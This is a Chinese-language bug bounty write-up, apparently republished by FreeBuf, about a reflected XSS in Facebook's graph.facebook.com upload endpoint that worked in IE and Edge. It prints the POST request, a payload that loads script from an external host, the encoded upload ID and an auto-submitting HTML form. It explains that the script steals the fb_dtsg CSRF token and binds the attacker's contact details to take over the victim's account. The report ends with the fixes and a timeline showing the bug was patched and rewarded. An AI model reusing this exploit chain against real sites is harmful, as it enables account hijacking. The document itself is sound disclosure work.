利用graph.facebook.com中的反射型XSS實現Facebook賬戶劫持

• 2019 年 12 月 23 日
• 筆記

漏洞情況

該漏洞只在IE和Edge瀏覽器中有效，漏洞原因在於graph.facebook.com中的某些API端點，在處理HTML代碼響應時未實施完善安全的轉義措施。響應消息存在於JSON格式中，HTML代碼被當做其中一個字段的值也包含在內，而且響應消息不附帶Content-Type 或 X-Content-Type-Options頭，這樣我就能有機會在IE/Edge中構造代碼執行了。（這兩類瀏覽器會掃描整個頁面確定MIME文件類型，而其它瀏覽器只檢查前幾個字符）。

漏洞復現

1、首先，我們發送以下上傳方式的POST請求：

POST /app/uploads  Host: graph.facebook.com  access_token=ACCESS_TOKEN&file_length=100&file_type=PAYLOAD

其中的ACCESS_TOKEN是由Facebook for Android的第一方應用生成的有效用戶訪問令牌，PAYLOAD則是我們想插入的HTML代碼，用於後續引誘受害者在瀏覽器中執行。當提交請求後，遠程服務端會返回一個類似如下的值，其中包含一個後續會用到的會話ID（具體請參考Facebook官方說明）：

{  "id": "upload:MTphdHRhY2htZW50Ojlk2mJiZxUwLWV6MDUtNDIwMy05yTA3LWQ4ZDPmZGFkNTM0NT8=?sig=ARZqkGCA_uQMxC8nHKI"  }

經測試發現，其響應消息中沒有內容安全策略（CSP）限制，所以，我想到了能不能用一個包含外部鏈接的js文件來插入HTML代碼，例如：

<html><body><script src=//DOMAIN.com/script.js ></script></body></html>

2、這裡的上傳請求被Facebook後端做了Base64編碼處理，返回顯示如下，其中包含了我們特意植入的Payload：

upload:MTphdHRhY2htZW50OjZiZnNjNmYxLTljY2MtNDQxNi05YzM1LTFlc2YyMmI5OGlmYz9maWxlX2xlbmd0aD0wJmZpbGVfdHlwZT08aHRtbD48Y**keT48c2NyaXB0IHNyYz0vL0RPTUFJTi5jb20vc2NyaXB0LmpzID48L3NjcmlwdD48L2JvZHk+PC9odG1sPg==?sig=ARaCDqLfwoeI8V3s

所以，用該編碼串之後就會有如下請求，用它可以向Facebook發起POST請求：

https://graph.facebook.com/upload:MTphdHRhY2htZW50OjZiZnNjNmYxLTljY2MtNDQxNi05YzM1LTFlc2YyMmI5OGlmYz9maWxlX2xlbmd0aD0wJmZpbGVfdHlwZT08aHRtbD48Y**keT48c2NyaXB0IHNyYz0vL0RPTUFJTi5jb20vc2NyaXB0LmpzID48L3NjcmlwdD48L2JvZHk+PC9odG1sPg==?sig=ARaCDqLfwoeI8V3s

3、由此，利用以上請求串，我向其中加入我在第1步中生成的有效access_token，構造了一個HTML網頁放到了我的網站中：

<html>  <body>  <form action=」https://graph.facebook.com/upload:MTphdHRhY2htZW50OjZiZnNjNmYxLTljY2MtNDQxNi05YzM1LTFlc2YyMmI5OGlmYz9maWxlX2xlbmd0aD0wJmZpbGVfdHlwZT08aHRtbD48Y**keT48c2NyaXB0IHNyYz0vL0RPTUFJTi5jb20vc2NyaXB0LmpzID48L3NjcmlwdD48L2JvZHk+PC9odG1sPg==?sig=ARaCDqLfwoeI8V3s&access_token=MY_ACCESS_TOKEN」    method=」POST」><input name=」random_」 value=」random」>  <input type=」submit」 value=」Submit」 />  </form>  <script type =」text/javascript 「>  document.forms[0].submit();  </script>  </body>  </html>

該頁面包含了一個提交樣式，受害者訪問之後的響應消息如下：

{「h」:」2::<html><body><script src=//DOMAIN.com/script.js ></script></body></html>:GVo0nVVSEBm2kCDZXKFCdFSlCSZjbugbAAAP:e:1571103112:REDACATED:REDACATED:ARCvdJWLVDpBjUAZzrg」}

重要的是，https://DOMAIN.com/script.js中的腳本文件將幫助我竊取受害者的「fb_dtsg」 CSRF token，並且可向https://www.facebook.com/api/graphql/發送一個添加手機號或郵箱地址的綁定請求，實現間接的受害者賬戶劫持。

漏洞修復

1、在file_type參數中加入對HTML代碼處理的安全轉義措施； 2、給每個響應中加入「Content-type: application/json」 頭避免進一步的攻擊。

漏洞上報及處理進程

2019.10.10 漏洞初報 2019.10.10 Facebook確認 2019.10.11 Facebook修復 2019.10.24 Facebook獎勵5000$

*參考來源：ysamm，clouds編譯整理，轉載請註明來自 FreeBuf.COM